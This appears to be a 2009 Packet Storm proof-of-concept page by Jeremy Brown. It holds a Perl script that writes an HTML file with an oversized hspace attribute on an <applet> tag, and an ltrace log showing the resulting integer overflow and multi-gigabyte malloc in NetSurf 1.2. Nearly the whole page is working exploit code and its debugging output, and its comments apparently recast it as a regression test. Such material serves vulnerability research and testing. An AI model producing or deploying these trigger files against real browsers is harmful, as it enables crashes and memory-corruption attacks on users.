NetSurf 1.2 hspace Integer Overflow Proof Of Concept

2009-01-15T00:00:00
ID PACKETSTORM:73920
Type packetstorm
Reporter Jeremy Brown
Modified 2009-01-15T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# netsurf_hspace_intof1.pl  
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit  
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]  
#   
# [ltrace log -- hspace = 30000, without --sync]  
#   
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)  
# = 0x8cbda01  
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)  
# = 0  
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)  
# = 0  
# cairo_clip(0xb6600948, 0, 0, 0, 0)  
# = 0xb6600aec  
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)  
# = 0x8cbda01  
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>  
# malloc(3073536192) /// HUGE MALLOC  
# = NULL  
# <... gdk_pixbuf_get_from_drawable resumed> )  
# = 0  
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>  
# free(0xb6600dc8)  
# = <void>  
# free(0xb6600de0)  
# = <void>  
#   
# Adv Ref: netsurf_multiple_adv.txt  
  
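use strict;
use warnings;

# Writes a three-line HTML test case whose <applet> element carries an
# oversized hspace attribute. The ltrace log in the header (captured with
# hspace = 30000; this file uses 32767) shows the effect on NetSurf 1.2:
# a multi-gigabyte malloc() request that returns NULL inside
# gdk_pixbuf_get_from_drawable(). The generated file can serve as a
# regression test case; a fixed build is expected to render it without
# that allocation (the fix itself is not shown on this page).
#
# Usage: netsurf_hspace_intof1.pl <filename.html>

my $filename = $ARGV[0];
if (!defined $filename) {
    # Stop here: the original printed the usage line and then fell through
    # to open() with an undefined filename.
    print "Usage: $0 <filename.html>\n";
    exit 1;
}

my $head = "<html>\n";
my $trig = qq{<applet code="test.class" hspace="32767">\n};
# Alternative element carrying the same attribute, left disabled by the author:
#my $trig = qq{<img src="test.jpg" hspace="32767">\n};
my $foot = "</html>";

my $data = $head . $trig . $foot;

# Three-argument open with a lexical handle: the filename comes from the
# command line, and the two-argument form would let characters in it change
# the open mode. Every I/O step is checked so that a failed write is
# reported rather than silently leaving no test file.
open(my $out, '>', $filename)
    or die "Cannot open '$filename' for writing: $!\n";
print {$out} $data
    or die "Cannot write to '$filename': $!\n";
close($out)
    or die "Cannot close '$filename': $!\n";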
  
exit;`